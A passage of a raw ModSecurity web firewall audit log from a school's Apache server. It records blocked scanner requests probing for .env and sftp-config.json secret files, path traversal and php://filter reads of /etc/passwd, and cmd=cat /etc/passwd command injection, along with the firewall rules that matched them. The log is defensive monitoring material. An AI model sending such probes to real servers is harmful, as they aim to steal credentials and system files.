--4d9cf44d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d9cf44d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384864286119 1808 (- - -) Stopwatch2: 1747384864286119 1808; combined=728, p1=327, p2=374, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d9cf44d-Z-- --a8b8d801-A-- [16/May/2025:15:41:05 +0700] aCb6IdhEtho3ciA0weghrAAAAJc 103.236.140.4 47750 103.236.140.4 8181 --a8b8d801-B-- GET /ftps.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a8b8d801-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8b8d801-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384865266478 1536 (- - -) Stopwatch2: 1747384865266478 1536; combined=624, p1=304, p2=292, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8b8d801-Z-- --df74ef04-A-- [16/May/2025:15:41:05 +0700] aCb6Ice47ocjCGWTS4b7SwAAAEY 103.236.140.4 47752 103.236.140.4 8181 --df74ef04-B-- GET /ftp-config.conf HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --df74ef04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df74ef04-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384865461807 1740 (- - -) Stopwatch2: 1747384865461807 1740; combined=665, p1=323, p2=316, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df74ef04-Z-- --6294e159-A-- [16/May/2025:15:41:05 +0700] aCb6IdhEtho3ciA0weghrwAAAIM 103.236.140.4 47758 103.236.140.4 8181 --6294e159-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6294e159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6294e159-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384865738846 745 (- - -) Stopwatch2: 1747384865738846 745; combined=268, p1=238, p2=0, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6294e159-Z-- --4de8111b-A-- [16/May/2025:15:41:05 +0700] aCb6IUE0LfP59mkCzg73dAAAANE 103.236.140.4 47760 103.236.140.4 8181 --4de8111b-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4de8111b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4de8111b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384865851980 722 (- - -) Stopwatch2: 1747384865851980 722; combined=288, p1=251, p2=0, p3=0, p4=0, p5=36, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4de8111b-Z-- --cfa81543-A-- [16/May/2025:15:41:06 +0700] aCb6Ite6THFz1hsaJaKRjQAAAAA 103.236.140.4 47762 103.236.140.4 8181 --cfa81543-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --cfa81543-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfa81543-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384866046120 717 (- - -) Stopwatch2: 1747384866046120 717; combined=280, p1=244, p2=0, p3=0, p4=0, p5=35, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfa81543-Z-- --f36ebf59-A-- [16/May/2025:15:41:08 +0700] aCb6JNhEtho3ciA0weghsgAAAIc 103.236.140.4 47790 103.236.140.4 8181 --f36ebf59-B-- GET /api/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f36ebf59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f36ebf59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384868323151 680 (- - -) Stopwatch2: 1747384868323151 680; combined=263, p1=235, p2=0, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f36ebf59-Z-- --77201921-A-- [16/May/2025:15:41:09 +0700] aCb6Jde6THFz1hsaJaKRkwAAAAQ 103.236.140.4 47806 103.236.140.4 8181 --77201921-B-- GET /.env.save HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --77201921-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77201921-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384869670298 694 (- - -) Stopwatch2: 1747384869670298 694; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77201921-Z-- --d67fb138-A-- [16/May/2025:15:41:10 +0700] aCb6Jte6THFz1hsaJaKRmAAAAAk 103.236.140.4 47816 103.236.140.4 8181 --d67fb138-B-- GET /.env.prod HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d67fb138-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d67fb138-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384870437146 661 (- - -) Stopwatch2: 1747384870437146 661; combined=266, p1=241, p2=0, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d67fb138-Z-- --4630940f-A-- [16/May/2025:15:41:16 +0700] aCb6LNe6THFz1hsaJaKRuwAAABE 103.236.140.4 47888 103.236.140.4 8181 --4630940f-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4630940f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4630940f-E-- --4630940f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384876640704 1198 (- - -) Stopwatch2: 1747384876640704 1198; combined=349, p1=237, p2=93, p3=0, p4=0, p5=19, sr=49, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4630940f-Z-- --c9fe1908-A-- [16/May/2025:15:41:16 +0700] aCb6LNe6THFz1hsaJaKRvAAAABU 103.236.140.4 47890 103.236.140.4 8181 --c9fe1908-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c9fe1908-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9fe1908-E-- --c9fe1908-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384876834900 1377 (- - -) Stopwatch2: 1747384876834900 1377; combined=455, p1=340, p2=89, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9fe1908-Z-- --ed49833e-A-- [16/May/2025:15:41:17 +0700] aCb6Lde6THFz1hsaJaKRvQAAABM 103.236.140.4 47892 103.236.140.4 8181 --ed49833e-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ed49833e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed49833e-E-- --ed49833e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384877029326 1553 (- - -) Stopwatch2: 1747384877029326 1553; combined=425, p1=308, p2=91, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed49833e-Z-- --2fd56a13-A-- [16/May/2025:15:41:17 +0700] aCb6Lde6THFz1hsaJaKRvgAAAAA 103.236.140.4 47894 103.236.140.4 8181 --2fd56a13-B-- GET /php/ping.php?cmd=cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2fd56a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fd56a13-E-- --2fd56a13-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/ping.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384877223706 1385 (- - -) Stopwatch2: 1747384877223706 1385; combined=442, p1=321, p2=94, p3=0, p4=0, p5=26, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fd56a13-Z-- --f98b9e72-A-- [16/May/2025:15:41:17 +0700] aCb6Lde6THFz1hsaJaKRvwAAABQ 103.236.140.4 47896 103.236.140.4 8181 --f98b9e72-B-- GET /php/file.php?cmd=cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f98b9e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f98b9e72-E-- --f98b9e72-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/file.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384877419018 1348 (- - -) Stopwatch2: 1747384877419018 1348; combined=449, p1=332, p2=91, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f98b9e72-Z-- --991a505d-A-- [16/May/2025:15:41:17 +0700] aCb6LdhEtho3ciA0weghtQAAAIw 103.236.140.4 47898 103.236.140.4 8181 --991a505d-B-- GET /php/download.php?cmd=cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --991a505d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --991a505d-E-- --991a505d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/download.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384877613379 1532 (- - -) Stopwatch2: 1747384877613379 1532; combined=467, p1=336, p2=104, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --991a505d-Z-- --0fe81737-A-- [16/May/2025:15:41:17 +0700] aCb6LdhEtho3ciA0weghtgAAAJE 103.236.140.4 47900 103.236.140.4 8181 --0fe81737-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --0fe81737-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fe81737-E-- --0fe81737-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384877808357 1612 (- - -) Stopwatch2: 1747384877808357 1612; combined=488, p1=366, p2=91, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fe81737-Z-- --1a412925-A-- [16/May/2025:15:41:18 +0700] aCb6LthEtho3ciA0weghtwAAAIs 103.236.140.4 47902 103.236.140.4 8181 --1a412925-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1a412925-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a412925-E-- --1a412925-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access 